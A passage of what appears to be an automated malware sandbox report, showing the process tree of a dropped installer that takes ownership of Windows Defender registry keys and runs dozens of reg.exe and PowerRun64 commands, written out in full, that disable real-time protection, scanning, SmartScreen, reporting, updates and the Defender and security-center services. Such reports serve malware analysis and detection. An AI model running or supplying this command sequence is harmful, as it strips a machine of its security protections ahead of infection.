C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f3⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f3⤵PID:2744
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f3⤵PID:4872
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f3⤵PID:4572
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f3⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f3⤵PID:2764
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f3⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f3⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f3⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f3⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f3⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:3708
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f3⤵PID:4800
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:4044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f3⤵PID:4048
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f3⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f3⤵PID:3208
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f3⤵PID:3752
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f3⤵PID:4900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:4248
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f3⤵PID:3172
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f3⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f3⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f3⤵PID:672
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f3⤵PID:3000
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f3⤵PID:2820
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f3⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f3⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f3⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f3⤵PID:3112
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4004
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3212
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2136
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2912
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3468
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3852
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f3⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f3⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f3⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f3⤵PID:3804
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f3⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f3⤵PID:4596
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f3⤵PID:2992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f3⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f3⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f3⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f3⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f3⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f3⤵PID:4028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f3⤵PID:2696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f3⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f3⤵PID:2160
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f3⤵PID:2596
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f3⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f3⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f3⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f3⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f3⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f3⤵PID:1944
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f3⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f3⤵PID:3348
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f3⤵PID:1124
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f3⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f3⤵PID:4808
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f3⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f3⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f3⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f3⤵PID:1352
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f3⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:2028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:1560
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f3⤵PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4336 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:1652
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:844 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2596 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:4208
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4052 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2052
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4912 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:1040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3312 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2708
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2596
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1128 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:1420
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4384 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:512
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4320 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5016 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:1604
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:820 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1652 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:4084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:212 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3752 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:4912
-
-
-
-
-
